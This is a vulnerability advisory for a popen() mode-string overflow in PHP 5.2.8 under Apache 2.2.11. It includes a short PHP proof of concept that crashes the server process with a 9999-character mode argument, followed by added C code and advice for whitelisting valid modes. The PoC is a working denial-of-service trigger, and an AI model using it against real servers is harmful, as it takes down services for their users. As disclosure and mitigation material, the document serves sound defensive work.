Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)

Type: Remote and Local

Requirements for exploit: popen() enabled.

By: e.wiZz!  Enes Mušić   [email protected]

PHP popen() function overview:

popen() opens a pipe to a process started by forking and executing the given
command. It has been available since PHP 4.

     popen ( string $command_to_execute , string $mode )

The second argument, the mode string, is the vulnerable one: passing an
oversized mode string overflows a buffer and crashes PHP. Apache is named in
the title because running poc.php through Apache crashes the HTTP server
process without leaving any entry in the error log. The crash reproduces on
WAMP as well, both from the CLI and through a browser. Note that the PoC below
demonstrates only the crash, i.e. a denial of service of the process running
PHP; it does not show control over the overwritten data or over execution.

Tested on: PHP 5.2.8/4.2.1/4.2.0
           Apache 2.2.11

PoC:

<?php
// Mode string far longer than any valid popen() mode ("r" or "w").
$____buff = str_repeat("A", 9999);
// The command itself is irrelevant; the oversized mode argument triggers the crash.
$handle = popen('/whatever/', $____buff);
echo $handle;
?>
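As an added example, not part of the original advisory and not PHP's own source, the following C code shows the kind of mode-string check a popen() wrapper should perform before handing the string to the C library. The helper names (valid_popen_mode, checked_popen, long_mode_is_rejected) are my own, and the accepted set of modes is an assumption: "r" and "w" as popen(3) defines them, plus the "rb"/"wb" spellings seen in C-runtime usage on Windows. It feeds the wrapper the same 9999-byte string of 'A's as the PoC (constructed inline) and rejects it with EINVAL instead of letting it reach popen().

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Whitelist check for a popen() mode string (assumed valid set:
 * "r", "w", "rb", "wb"). Returns 1 if acceptable, 0 otherwise. */
int valid_popen_mode(const char *mode)
{
    size_t len = 0;

    if (mode == NULL)
        return 0;
    /* Bound the scan: anything longer than two bytes is invalid whatever
     * its content, so never walk the whole (possibly huge) string. */
    while (len < 3 && mode[len] != '\0')
        len++;
    if (len < 1 || len > 2)
        return 0;
    if (mode[0] != 'r' && mode[0] != 'w')
        return 0;
    if (len == 2 && mode[1] != 'b')
        return 0;
    return 1;
}

/* popen(3) wrapper (hypothetical name) that refuses invalid modes with
 * EINVAL rather than leaving the decision to the C runtime. */
FILE *checked_popen(const char *command, const char *mode)
{
    char posix_mode[2];

    if (!valid_popen_mode(mode)) {
        errno = EINVAL;
        return NULL;
    }
    /* 'b' has no meaning on POSIX; pass only "r" or "w" downstream. */
    posix_mode[0] = mode[0];
    posix_mode[1] = '\0';
    return popen(command, posix_mode);
}

/* Builds the advisory's input (9999 'A's, constructed here) and reports
 * whether the wrapper rejected it: 1 = rejected, 0 = accepted, -1 = OOM. */
int long_mode_is_rejected(void)
{
    const size_t n = 9999;
    char *mode = malloc(n + 1);
    FILE *fp;
    int rejected;

    if (mode == NULL)
        return -1;
    memset(mode, 'A', n);
    mode[n] = '\0';

    errno = 0;
    fp = checked_popen("/whatever/", mode);
    rejected = (fp == NULL && errno == EINVAL);
    if (fp != NULL)
        pclose(fp);
    free(mode);
    return rejected;
}

int main(void)
{
    printf("valid_popen_mode(\"r\")  = %d\n", valid_popen_mode("r"));
    printf("valid_popen_mode(\"rw\") = %d\n", valid_popen_mode("rw"));
    printf("9999-byte mode rejected = %d\n", long_mode_is_rejected());
    return 0;
}
```

The same whitelist can be applied at the PHP level while a build is unpatched: wrap popen() in a function that checks the mode against the same four strings and refuses anything else before the call.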
